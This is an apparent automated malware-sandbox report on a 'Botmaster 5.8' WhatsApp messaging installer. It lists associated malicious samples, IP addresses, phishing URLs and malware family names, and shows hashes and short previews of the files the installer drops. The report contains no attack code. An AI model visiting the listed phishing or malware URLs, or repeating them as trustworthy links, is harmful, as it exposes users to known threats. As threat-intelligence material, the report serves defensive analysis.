                                                                                                                                                            SecuriteInfo.com.Win32.TrojanX-gen.14355.18862.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                                                                              SecuriteInfo.com.Win32.TrojanX-gen.25708.26240.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                                                                                SecuriteInfo.com.Win32.TrojanX-gen.22310.9631.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                                                                                  file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                                                                                    file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                                                                                      SecuriteInfo.com.Win32.TrojanX-gen.21065.25594.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                                                                                        qDpEAnF5Ju.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                                                                                          QpZhH052mS.exeGet hashmaliciousAmadey, RedLine, RisePro StealerBrowse
                                                                                                                                                                            172.64.41.3SecuriteInfo.com.Win32.PUP-gen.2847.28870.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              YmXa44bW67.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                YmXa44bW67.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  PdfConverters.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    Undeliverable IMPORTANT TAX RETURN DOCUMENT AVAILABLE LCAPOZZO #Ud83d#Udcd1 - 2 16 2024.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                      Channels.xmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        SW_PC_Interact2.3.5_Build6.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                                                          SW_PC_Interact2.3.5_Build6.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                                                            Sample.xmlGet hashmaliciousUnknownBrowse

                                                                                                                                                                                              Domains

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              chrome.cloudflare-dns.comSecuriteInfo.com.Win32.PUP-gen.2847.28870.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                              YmXa44bW67.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                              YmXa44bW67.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                              Google Digital Marketing .xlsx.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                              Google Digital Marketing .xlsx.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                              PdfConverters.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                              Channels.xmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                              SW_PC_Interact2.3.5_Build6.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                              SW_PC_Interact2.3.5_Build6.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                              msftstore.s.llnwi.netjXYtApvcx3.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                                                                                                              • 69.164.0.0
                                                                                                                                                                                              TBcsV64JvR.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                                                                                                              • 69.164.42.0
                                                                                                                                                                                              SecuriteInfo.com.Win32.TrojanX-gen.490.17180.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                                                                                              • 69.164.42.0
                                                                                                                                                                                              SecuriteInfo.com.Win32.TrojanX-gen.9408.7245.exeGet hashmaliciousAmadey, PureLog Stealer, RisePro StealerBrowse
                                                                                                                                                                                              • 69.164.42.0
                                                                                                                                                                                              plata.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                                                                                                              • 69.164.42.0
                                                                                                                                                                                              nqofY4GAvT.exeGet hashmaliciousAmadey, RisePro Stealer, XmrigBrowse
                                                                                                                                                                                              • 69.164.42.0
                                                                                                                                                                                              lAUDgQE4W5.exeGet hashmaliciousAmadey, RisePro Stealer, SmokeLoader, XmrigBrowse
                                                                                                                                                                                              • 69.164.42.0
                                                                                                                                                                                              KFP.311.152.2023.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 208.111.176.128
                                                                                                                                                                                              838d328e3b66925c54f440a96ac2a877.htmlGet hashmaliciousReCaptcha PhishBrowse
                                                                                                                                                                                              • 69.164.40.8
                                                                                                                                                                                              SecuriteInfo.com.Trojan.Siggen1.42086.13664.30961.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 69.164.0.0

                                                                                                                                                                                              ASNs

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              COGECO-PEER1CAWGHFgjyKDE.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 216.247.181.74
                                                                                                                                                                                              NX9ITZc5iJ.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 209.35.254.23
                                                                                                                                                                                              L0zZGsMbgk.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 192.154.251.64
                                                                                                                                                                                              EadBqsohhH.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 69.90.30.223
                                                                                                                                                                                              https://yahu.pages.dev/account/js-reporting/?crumb=F3RZp873jWJ&message=javascript_not_enabled&ref=%2FGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 69.90.133.51
                                                                                                                                                                                              https://fnbo-alerts.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 209.25.233.254
                                                                                                                                                                                              SecuriteInfo.com.Win32.Trojan.Agent.M47LP3.18905.20801.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 69.90.133.51
                                                                                                                                                                                              SecuriteInfo.com.Win32.Trojan.Agent.M47LP3.18905.20801.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 69.90.133.51
                                                                                                                                                                                              http://biadshome.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 69.90.133.51
                                                                                                                                                                                              MICROSOFT-CORP-MSN-AS-BLOCKUSuKbXAans9z.exeGet hashmaliciousGlupteba, Mars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                              • 20.189.173.20
                                                                                                                                                                                              https://cauce.member365.ca/ecommunication/api/click/fTHL3yQwZqMF3t4GeIvSCw/9eWYH6BfA-e-OeIU2EZMcg?r=https://securemil.bsa944.org/Get hashmaliciousReCaptcha PhishBrowse
                                                                                                                                                                                              • 13.107.213.69
                                                                                                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 20.42.65.92
                                                                                                                                                                                              vrcd941p2O.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 52.125.117.86
                                                                                                                                                                                              Fh0kScswH7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 111.221.112.52
                                                                                                                                                                                              vJSyCK4is2.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 20.126.207.17
                                                                                                                                                                                              dOFtshU17q.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 40.126.152.216
                                                                                                                                                                                              p4pU29bYMV.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 51.134.7.108
                                                                                                                                                                                              LsgqN88sQ4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 72.154.250.59
                                                                                                                                                                                              CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                                                                                              • 104.21.44.94
                                                                                                                                                                                              file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                                                                                              • 104.26.4.15
                                                                                                                                                                                              SecuriteInfo.com.Win64.TrojanX-gen.17769.2791.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.21.90.199
                                                                                                                                                                                              DHL L&S - 1C23THP 00042194.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                              • 104.26.12.205
                                                                                                                                                                                              SecuriteInfo.com.Win64.TrojanX-gen.17769.2791.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.21.90.199
                                                                                                                                                                                              uKbXAans9z.exeGet hashmaliciousGlupteba, Mars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                              • 172.67.177.133
                                                                                                                                                                                              https://cauce.member365.ca/ecommunication/api/click/fTHL3yQwZqMF3t4GeIvSCw/9eWYH6BfA-e-OeIU2EZMcg?r=https://securemil.bsa944.org/Get hashmaliciousReCaptcha PhishBrowse
                                                                                                                                                                                              • 172.67.215.1
                                                                                                                                                                                              SecuriteInfo.com.Win32.PUP-gen.2847.28870.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.67.169.89
                                                                                                                                                                                              WEHOSTWEBSITES-COMUShuhu.mips-20240212-0910.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                              • 72.18.135.194
                                                                                                                                                                                              an_international_agreement_to_voluntarily_limit_greenhouse_gas_emissions_is_called_the_60718.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 173.248.144.189
                                                                                                                                                                                              AqR4iHLU9B.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 23.239.207.76
                                                                                                                                                                                              ttu0YZmLUl.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                                              • 178.218.146.89
                                                                                                                                                                                              bI0B9Ewwum.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                                              • 178.218.146.89
                                                                                                                                                                                              SZaep3pXQ7.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                                              • 178.218.146.89
                                                                                                                                                                                              a-r.m-4.ISIS.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                                              • 178.218.146.89
                                                                                                                                                                                              a-r.m-6.ISIS.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                                              • 178.218.146.89
                                                                                                                                                                                              a-r.m-5.ISIS.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                                              • 178.218.146.89
                                                                                                                                                                                              MICROSOFT-CORP-MSN-AS-BLOCKUSuKbXAans9z.exeGet hashmaliciousGlupteba, Mars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                              • 20.189.173.20
                                                                                                                                                                                              https://cauce.member365.ca/ecommunication/api/click/fTHL3yQwZqMF3t4GeIvSCw/9eWYH6BfA-e-OeIU2EZMcg?r=https://securemil.bsa944.org/Get hashmaliciousReCaptcha PhishBrowse
                                                                                                                                                                                              • 13.107.213.69
                                                                                                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 20.42.65.92
                                                                                                                                                                                              vrcd941p2O.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 52.125.117.86
                                                                                                                                                                                              Fh0kScswH7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 111.221.112.52
                                                                                                                                                                                              vJSyCK4is2.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 20.126.207.17
                                                                                                                                                                                              dOFtshU17q.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 40.126.152.216
                                                                                                                                                                                              p4pU29bYMV.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 51.134.7.108
                                                                                                                                                                                              LsgqN88sQ4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 72.154.250.59

                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                              No context

                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Bcl.AsyncInterfaces.dllOrangeBot Installer - UAT (1.18.5.23313).msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                https://geteasypdf.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                  PostSharp-2024.0.4-rc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    MDE_File_Sample_4e8af2004a77f531e655e2e5cb669c388d0655c9.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      https://fastprintapp.com/lp1?channel=hud-gdn&tracking_id=142&oid=142&affid=1025&source_id=google&sub1=142imall&gclid=EAIaIQobChMI5Lzv2NSvgwMVXaOmBB3WUQkTEAEYASAAEgI9zPD_BwEGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        https://onelaunch.com/downloadGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          https://getquickmanuals.com/manuals/lp2Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            https://download.onelaunch.com/latest/Onelaunch%20Software.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              https://download.onelaunch.com/latest/Onelaunch%20Software.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.application

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (550), with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1805
                                                                                                                                                                                                                Entropy (8bit):5.211082988295327
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:3B9oLwOw8jZcTotSgHneTDxi7ig0n6N0kkQdEHTw:xWLwO9ZcTsneT0WSkw
                                                                                                                                                                                                                MD5:D45F410BEBCB1FC248BEB7FAE0FD44F0
                                                                                                                                                                                                                SHA1:DE471EC8FFA1B77B412A591D975BB9F6D1BD78B2
                                                                                                                                                                                                                SHA-256:D785A408820C82C90E306533CAE1879ED4FB9ECE0F7AA12B0AB77C50C9638700
                                                                                                                                                                                                                SHA-512:DF8BC17AB0AC0AC1BE9B57C60F5EB1917F737DCFCD8ECBA45C0DDABE0D569A798E71D6F0EE7B5E6FC7BF7D79BC8255FC4F500F9A2A15A6BF04B5A9BEC8B9075D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="BotMaster.application" version="1.0.0.0" publicKeyToken="0000000000000000" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="BotMaster" asmv2:product="BotMaster" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="true" />.. <compatibleFrameworks xmlns="urn:schemas-microsoft-com:clickon

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exe

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2941952
                                                                                                                                                                                                                Entropy (8bit):4.368119490757434
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12288:fhx7siRe9fEtTMd+8MIKJEz8Jfy5/uYSuwCV8YB09YnlzQ:fXDkxEtgc8PKuaCVHZl
                                                                                                                                                                                                                MD5:895F3A548FD8FA6FD1355AF6D218DA2C
                                                                                                                                                                                                                SHA1:F45065862543B4834B525AC235672D4B11F67EC9
                                                                                                                                                                                                                SHA-256:14A2312F1485E3B0ACD96127083BCA19DCA2988842DAE4928F7EDFE6CB2B47C4
                                                                                                                                                                                                                SHA-512:55DC3094822C57562C9761DC66B79799B5CFD1829AE81B82AE6AD5ECF545D1E5A11D7B522B182046FB98920D4CEE6E8106DB45ED8BFCF53FBEF6CF8AFE3EC774
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..d.........."...P..2(.........bP(.. ...`(...@.. .......................@-...........`..................................P(.O....`(.p.................... -......N(.............................................. ............... ..H............text...h0(.. ...2(................. ..`.rsrc...p....`(......4(.............@..@.reloc....... -.......,.............@..B................DP(.....H............................G...........................................0............("...(#.........(.....o$....*.....................(%......(&......('......((......()....*N..(....o....(*....*&..(+....*.s,........s-........s.........s/........s0........*....0...........~....o1....+..*.0...........~....o2....+..*.0...........~....o3....+..*.0...........~....o4....+..*.0...........~....o5....+..*.0..<........~.....(6.....,!r...p.....(7...o8...s9............~.....+..*.0......

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exe.config

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):564
                                                                                                                                                                                                                Entropy (8bit):5.0740538700827695
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:MMHdGGsVOsreOJ9LNFF7ap+5iplp7qf/2/dFicYo4xm:JdsrztPF7NQ7uH2/X9r
                                                                                                                                                                                                                MD5:39F34FD0CDDA615B78BBE7F9576BFC7B
                                                                                                                                                                                                                SHA1:B34C1D2097E16BC6197769C0E5895C1FB579D369
                                                                                                                                                                                                                SHA-256:A281F7A40A47C15A31A76616AE563CC461EFE00C1098FDA834226FBDA3F93A9D
                                                                                                                                                                                                                SHA-512:207BFFA47194D18CB498A071FB5C7F6E8FCE08CE736F235D5BF08B1A92AC5610C609D448EFADD3C73817001D3B55ADE36B148226030A3026D284EFC87D293C3F
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>..

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exe.manifest

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (504), with CRLF, LF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):18208
                                                                                                                                                                                                                Entropy (8bit):5.288630221697824
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:xXc5tu28iw+OuOLmuAJzAKdbGDb4xbxZxy3sTs6:xXc5tuvJ0s6
                                                                                                                                                                                                                MD5:E8704F80438109BC2A2AA65F9FC5C20C
                                                                                                                                                                                                                SHA1:CB639857A416AADE8F5DBBB6C15B000EA6AAB16B
                                                                                                                                                                                                                SHA-256:400EA9E7CCD70228FF7073A148B6D6972A54DA59D6CA61C689F7E48E4A030096
                                                                                                                                                                                                                SHA-512:9A59D33325FD6AFB8DEC503200D877B9165E23CC10681F08D8F02EF8E226C46B954DE6192E4CC8BF1BE90BC4034ABE7E91399B88FD3BB1F85D8D98D9D3D8C946
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="BotMaster.exe" version="1.0.0.0" publicKeyToken="0000000000000000" language="neutral" processorArchitecture="msil" type="win32" />.. <description asmv2:iconFile="BotmasterIcon.ico" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <application />.. <entryPoint>.. <assemblyIdentity name="BotMaster" version="5.8.0.1" language="neutral" processorArchitecture="msil" />.. <commandLine file="BotMaster.exe" parameters

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.pdb

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:MSVC program database ver 7.00, 512*1375 bytes
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):704000
                                                                                                                                                                                                                Entropy (8bit):4.22630193408373
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6144:tFSnnQd5XupJEw0rbBRqyr5XEsbGiTt0pPZdd1uuzZRw25RqdyaUA:ttu/Efb6iGlZdrucZh5Rqd
                                                                                                                                                                                                                MD5:680D8CB25E82565643635ADF63D6A5E1
                                                                                                                                                                                                                SHA1:74AEB54D2A1321715A6EBAC5F40D2A42301C6A8D
                                                                                                                                                                                                                SHA-256:3B1EAE4EE06996EFB289675C9D46F6D68C3913657125114586ACD27B5462CCD4
                                                                                                                                                                                                                SHA-512:77B47DC246E90DAEA9269BF30BD13C443AB01A5C6F639A953C2E02AD3E878AE9D6CBC77C7395717166191796106F70DC566D69921BA66FB47BCFE5948C8A3411
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:Microsoft C/C++ MSF 7.00...DS..........._...........[...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.xml

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4810
                                                                                                                                                                                                                Entropy (8bit):4.9963250103381
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:YJbH1QDUDT7GVNNxihfeWQTchbhfmaxTHO7Eg:YJbH1QDUDT7GVNNxiVeWQTKbRm47O7Eg
                                                                                                                                                                                                                MD5:4F6C1BD4D5B833BC7923D877C5367074
                                                                                                                                                                                                                SHA1:DEC24573BA485740254CA2A92673A4DB0B6B4C1C
                                                                                                                                                                                                                SHA-256:DE262D09B9E172FF84A85D1B504023C009CD92970A68AF1684AD48865BB36426
                                                                                                                                                                                                                SHA-512:8E45977A45716AEDA9DDCF15C3EB1777374E2BC55E334A7EEE3E49EDE2B4CF7F3F328782B9FF27383232F012B5A178383E95179E18755FE5DC22720B279E60AF
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0"?>..<doc>..<assembly>..<name>..BotMaster..</name>..</assembly>..<members>..<member name="T:BotMaster.My.Resources.Resources">..<summary>.. A strongly-typed resource class, for looking up localized strings, etc...</summary>..</member>..<member name="P:BotMaster.My.Resources.Resources.ResourceManager">..<summary>.. Returns the cached ResourceManager instance used by this class...</summary>..</member>..<member name="P:BotMaster.My.Resources.Resources.Culture">..<summary>.. Overrides the current thread's CurrentUICulture property for all.. resource lookups using this strongly typed resource class...</summary>..</member>..<member name="P:BotMaster.My.Resources.Resources._imports">..<summary>.. Looks up a localized resource of type System.Drawing.Bitmap...</summary>..</member>..<member name="P:BotMaster.My.Resources.Resources.addmsg">..<summary>.. Looks up a localized resource of type System.Drawing.Bitmap...</summary>..</member>..<member name="P:BotMaster.My.Reso

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\Languages\English.json

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):26248
                                                                                                                                                                                                                Entropy (8bit):5.053284363077672
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:czZEVfiLTDVQnvmjszRSOhgkRcADFBQxT:awfiL3VyvDzgOz5FBQxT
                                                                                                                                                                                                                MD5:A9536B928E39650DB8DB6E496F1A85BE
                                                                                                                                                                                                                SHA1:946F305B747C5F21B8EAE1152748F140DDE81A38
                                                                                                                                                                                                                SHA-256:DC57336A3B0C6FC4E9ABA14E0138BAC8149737D83D489B50B032303CA88B6AD4
                                                                                                                                                                                                                SHA-512:413596BC7B9B4348FA5B2360F050EACD61145D4CA8F10B773285F54B222F1852D95A51D45334F1EEA14E7A78F0738FE6C14283AE86CCED2A56ACDC810389A5AD
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:[..{"Key":"FrmAdd.BtnOK","Text":"OK"},..{"Key":"FrmAdd.BtnCancel","Text":"Cancel"},..{"Key":"FrmAdd.Label1","Text":"Country code"},..{"Key":"FrmAdd","Text":"Add Country Code"},..{"Key":"FrmAdd.FamiliarAccountBtnOk","Text":"OK"},..{"Key":"FrmAdd.FamiliarAccountBtnCancel","Text":"Cancel"},..{"Key":"FrmAdd.FamiliarAccountLabel1","Text":"Whatsapp Account Number"},..{"Key":"FrmAdd.FamiliarAccountLabel2","Text":"Please ensure that the account that you add it it's a whatsapp account and he is receiving messages from you"},..{"Key":"FrmAdd.FamiliarAccountText ","Text":"Add Whatsapp Familiar Account"},..{"Key":"FrmAdd.MessageBtnOK","Text":"OK"},..{"Key":"FrmAdd.MessageBtnCancel","Text":"Cancel"},..{"Key":"FrmAdd.MessageLabel1","Text":"Message"},..{"Key":"FrmAdd.MessageText ","Text":"Add Message"},..{"Key":"FrmAdvanced.BtnAddFamiliarAccount","Text":"Add"},..{"Key":"FrmAdvanced.BtnDeleteFamiliarAccount","Text":"Delete"},..{"Key":"FrmAdvanced.BtnAddMessages","Text":"Add"},..{"Key":"FrmAdvanced.Bt

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\Languages\Espa ol.json

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):36081
                                                                                                                                                                                                                Entropy (8bit):4.818968961339408
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:ayjg71nCUxZJQuXcqG8eXU9HmWz5N9vTH:buCU1Qt8ekxfzBLH
                                                                                                                                                                                                                MD5:5A190EFD96C50E29479419E0D28D9A55
                                                                                                                                                                                                                SHA1:C529655A3758087BD8970CB19B2284AE06EFAC22
                                                                                                                                                                                                                SHA-256:744EE1CFF7E2563A6824C553BFFA600F4181DF7DAEDEE265D94460B6A4F50E52
                                                                                                                                                                                                                SHA-512:01236CE3FFAC3176E4039D1C8928D2A21FE989F4A5BBFC62A51D1E17DA3204AD6300698613A6E3CFAD107F9AFBE92379EF932ADAC34A432724B36587AE4AF563
                                                                                                                                                                                                                Malicious:false
